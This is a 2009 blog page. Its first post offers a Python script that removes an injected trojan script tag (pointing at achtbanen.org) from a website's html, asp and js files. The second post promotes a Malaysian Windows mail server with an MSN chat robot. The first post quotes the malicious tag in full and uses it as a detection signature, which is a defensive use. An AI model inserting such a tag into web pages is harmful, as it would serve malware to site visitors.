Monday, October 19, 2009

Removing “achtbanen” trojan links

Ok so someone got careless and somehow his website files have had links to a trojan injected into them. Each of the html/asp files has been injected with a script “<script src=http://achtbanen.org/images/blah blah blah></script>”

I was asked to write a script to clean it up, so here it is: a script-injection remover. It will work on any injected one-liner script (modify the signature in “FindThis” in the source yourself); by default it removes this particular achtbanen line.

TrjLinkRemove.py

# Copyright 2009, codemagnet.blogspot.com



# Free to use ;-), just keep this credit comments.



 



import sys



import os



import nowlog



 



# Module-level configuration for TrjLinkRemove.
# Every action (file cleaned, partial match skipped, unreadable file) is
# written to "removed.log" in the current directory and echoed to the console.
logfile = nowlog.SetLogConfig("removed.log")

# Full form of the injected tag this script was written against.  Kept as a
# bare string expression for reference only; it has no effect at runtime.
"""<script src=http://achtbanen.org/images/b-one-default.php ></script>"""

# Start-of-injection signature for .asp/.html/.htm/.aspx files.  CleanFile cuts
# from this string through the next "</script>".  Matching is an exact
# substring search: a variant that changes the host, the path or the attribute
# quoting is not detected, so adjust this when the injected tag differs.
FindThis = "<script src=http://achtbanen.org/images"

# Start-of-injection signature for .js files; CleanFileJS expects ".php" to
# follow within MaximumIndexTail bytes.
FindThisJS = "document.write('<script src=http://"

MaximumIndexTail = 150 #  search 150 off the first found signature



 



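def dirwalk(dir):
    """Walk a directory tree, yielding the full path of every non-directory entry.

    Subdirectories are entered recursively, but a symlinked directory is
    yielded as an ordinary entry rather than followed, so a link loop cannot
    recurse forever.  A directory that cannot be listed (permissions, removed
    mid-walk, not a directory at all) is skipped instead of aborting the walk;
    any other error propagates to the caller.

    Args:
        dir: root directory to walk (parameter name kept for existing callers).

    Yields:
        str: path of each entry, built with os.path.join from *dir*.
    """
    try:
        entries = os.listdir(dir)
    except OSError:
        # Unreadable or missing directory: skip it, keep walking the rest.
        return
    for name in entries:
        fullpath = os.path.join(dir, name)
        if os.path.isdir(fullpath) and not os.path.islink(fullpath):
            for sub in dirwalk(fullpath):  # recurse into subdir
                yield sub
        else:
            yield fullpath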



                



            



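def CleanFile (filename) :
    """Remove every injected ``<script src=http://achtbanen.org/images...></script>`` tag from *filename*.

    The file is read as bytes and each occurrence of FindThis, together with
    everything up to and including the first ``</script>`` that follows it
    within MaximumIndexTail bytes, is cut out.  The cleaned content is written
    to a temporary ``<filename>.trj.rmv`` which is then swapped into place.
    The original is deleted, not kept as a backup, and the new file gets
    default permissions rather than the original's, so take a copy of the web
    root before running this if you want evidence of the injection.

    A file without the signature is left untouched.  If any occurrence has no
    closing tag inside the window, the file is logged as "partial found" and
    left untouched so nothing is cut blindly.  I/O errors are logged, never
    raised, and a half-written temporary file is removed on failure.

    Args:
        filename: path of the .asp/.html/.htm/.aspx file to clean.

    Returns:
        None.
    """
    # The file is handled as bytes; make the signature bytes as well so the
    # search works whether FindThis is a byte string or a text string.
    start_sig = FindThis if isinstance(FindThis, bytes) else FindThis.encode("latin-1")
    end_tag = b"</script>"

    try:
        with open(filename, "rb") as f:
            fb = f.read()
    except (IOError, OSError):
        logfile.error("unable to open file %s", filename)
        return

    # Collect the clean stretches between injections.
    pieces = []
    pos = 0
    found = False
    while True:
        i = fb.find(start_sig, pos)
        if i == -1:
            pieces.append(fb[pos:])
            break
        found = True
        search_from = i + len(start_sig)
        o = fb.find(end_tag, search_from, search_from + MaximumIndexTail)
        if o == -1:
            # No closing tag close enough: refuse to guess where the cut ends.
            logfile.error("partial found, ignored, %s", filename)
            return
        pieces.append(fb[pos:i])
        pos = o + len(end_tag)
    if not found:
        return

    newfile = filename + ".trj.rmv"
    backup = filename + ".xxxx"
    try:
        with open(newfile, "wb") as p:
            p.write(b"".join(pieces))
        # Two renames instead of one: os.rename will not overwrite an
        # existing target on Windows, where this tool is meant to run.
        os.rename(filename, backup)
        try:
            os.rename(newfile, filename)
        except OSError:
            os.rename(backup, filename)  # put the original back before reporting
            raise
        os.unlink(backup)
    except (IOError, OSError):
        logfile.error("unable to replace file %s", filename)
        # Do not leave the temporary copy lying around in the web root.
        if os.path.exists(newfile):
            try:
                os.unlink(newfile)
            except OSError:
                pass
        return
    logfile.info("Cleaning : %s", filename)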



   



#-------------------------------------------------------------------------#



 



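def CleanFileJS (filename) :
    """Remove every injected ``document.write('<script src=http://...php`` line from *filename*.

    Same procedure as CleanFile, for .js files: the file is read as bytes and
    each occurrence of FindThisJS is cut from the signature through the end of
    the line on which the ``.php`` suffix of the URL is found (``.php`` must
    appear within MaximumIndexTail bytes of the signature).  The cleaned
    content is written to ``<filename>.trj.rmv`` and swapped into place; the
    original is deleted rather than kept as a backup.

    Only the injected line is removed, so legitimate code that follows an
    injection survives.  An injection that spans several lines leaves its
    later lines behind and must be dealt with by hand.  A partial match (no
    ``.php`` in the window) is logged and the file left untouched.  I/O errors
    are logged, never raised, and a half-written temporary file is removed on
    failure.

    Args:
        filename: path of the .js file to clean.

    Returns:
        None.
    """
    start_sig = FindThisJS if isinstance(FindThisJS, bytes) else FindThisJS.encode("latin-1")
    url_end = b".php"

    try:
        with open(filename, "rb") as f:
            fb = f.read()
    except (IOError, OSError):
        logfile.error("unable to open file %s", filename)
        return

    pieces = []
    pos = 0
    found = False
    while True:
        i = fb.find(start_sig, pos)
        if i == -1:
            pieces.append(fb[pos:])
            break
        found = True
        search_from = i + len(start_sig)
        o = fb.find(url_end, search_from, search_from + MaximumIndexTail)
        if o == -1:
            logfile.error("partial found, ignored, %s", filename)
            return
        pieces.append(fb[pos:i])
        # Drop the rest of the injected line, newline included.
        eol = fb.find(b"\n", o + len(url_end))
        pos = len(fb) if eol == -1 else eol + 1
    if not found:
        return

    newfile = filename + ".trj.rmv"
    backup = filename + ".xxxx"
    try:
        with open(newfile, "wb") as p:
            p.write(b"".join(pieces))
        # Two renames instead of one: os.rename will not overwrite an
        # existing target on Windows, where this tool is meant to run.
        os.rename(filename, backup)
        try:
            os.rename(newfile, filename)
        except OSError:
            os.rename(backup, filename)  # put the original back before reporting
            raise
        os.unlink(backup)
    except (IOError, OSError):
        logfile.error("unable to replace file %s", filename)
        if os.path.exists(newfile):
            try:
                os.unlink(newfile)
            except OSError:
                pass
        return
    logfile.info("Cleaning : %s", filename)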



 



            



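def cleanup (path) :
    """Walk *path* and run the matching cleaner on every web file found.

    .asp/.html/.htm/.aspx files are passed to CleanFile and .js files to
    CleanFileJS; everything else is ignored.  The extension is taken with
    os.path.splitext, so a dot elsewhere in the path is never mistaken for
    the start of an extension.

    Args:
        path: root directory to walk.

    Returns:
        None.
    """
    handlers = {
        "asp": CleanFile,
        "html": CleanFile,
        "htm": CleanFile,
        "aspx": CleanFile,
        "js": CleanFileJS,
    }
    for entry in dirwalk(path):
        ext = os.path.splitext(entry)[1].lower().lstrip(".")
        handler = handlers.get(ext)
        if handler is not None:
            handler(entry)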



      



 



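if __name__ == "__main__" :
    # Command-line entry point: TrjLinkRemove <path>
    # Single-argument print() works on both Python 2 and 3.
    if len(sys.argv) < 2:
        print("Removes achtbanen trojan links from all webfiles")
        print("TrjLinkRemove <path>")
        print("e.g TrjLinkRemove c:\\iisroot")
        sys.exit(1)

    root = sys.argv[1]
    # cleanup walks a directory; a plain file here would silently do nothing.
    if not os.path.isdir(root):
        print("invalid path given")
        sys.exit(1)

    cleanup(root)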



        



    




nowlog.py





import logging, logging.handlers



 



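def SetLogConfig (namefile):
    """Return a logger named *namefile* that writes INFO and above to that file and to the console.

    The file handler rotates at midnight and keeps 14 days of history; each
    record carries a timestamp, the level and the thread id.  Calling this
    again with the same name returns the same logger without attaching a
    second pair of handlers, so no record is ever written twice.

    Args:
        namefile: path of the log file, also used as the logger name.

    Returns:
        logging.Logger configured as described.
    """
    logger = logging.getLogger(namefile)
    if logger.handlers:
        # Already configured by an earlier call; reuse as is.
        return logger

    file_handler = logging.handlers.TimedRotatingFileHandler(
        namefile, 'midnight', 1, backupCount=14)
    file_handler.setLevel(logging.INFO)
    fmt = "%(asctime)-15s %(levelname)s:[%(thread)d]:%(message)s"
    file_handler.setFormatter(logging.Formatter(fmt))

    console = logging.StreamHandler()
    console.setLevel(logging.INFO)

    logger.addHandler(file_handler)
    logger.addHandler(console)
    logger.setLevel(logging.INFO)
    return logger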








* sorry about the formatting –.- was using a code snippet plugin

Wednesday, October 14, 2009

World First Email Server with MSN Robot (Avatar)

This is probably true as the team gets ready to launch MailNow!5

MailNow! 5 is a Windows mail server in the same class as SmarterMail, Mdaemon, Merak and Hmail. The difference is the amount of innovation the team has built into MailNow! 5: it eliminates log searching, greps etc. for mail tracing, prevents domain queue hogging, and adds accountability features that are well outside the conventional school.

One distinctive feature is the world's first email server robot, or avatar. It is an MSN robot that informs users of the mail server status, alerts them to new mail with details, collects log files, sends SMS alerts, composes emails, retrieves emails, provides email server spam statistics and emails-per-hour statistics, and offers an “eliza” chat for idle users.

Looks really cool when it was demoed today. I guess the folks attending the launch on 12 Nov, 2009  will get some sneak peek too. (www.internetnow.com.my)

If you see any other mail servers adding this feature in the future, you heard it here first: the Malaysian-made MailNow! 5, the Windows mail server, had the first ever robot.

The team won’t be patenting it; they are too engrossed in technical development to invest in the legal procedures needed to write such a patent. Chances are MS Exchange will build one super robot in the future, and who’s gonna sue?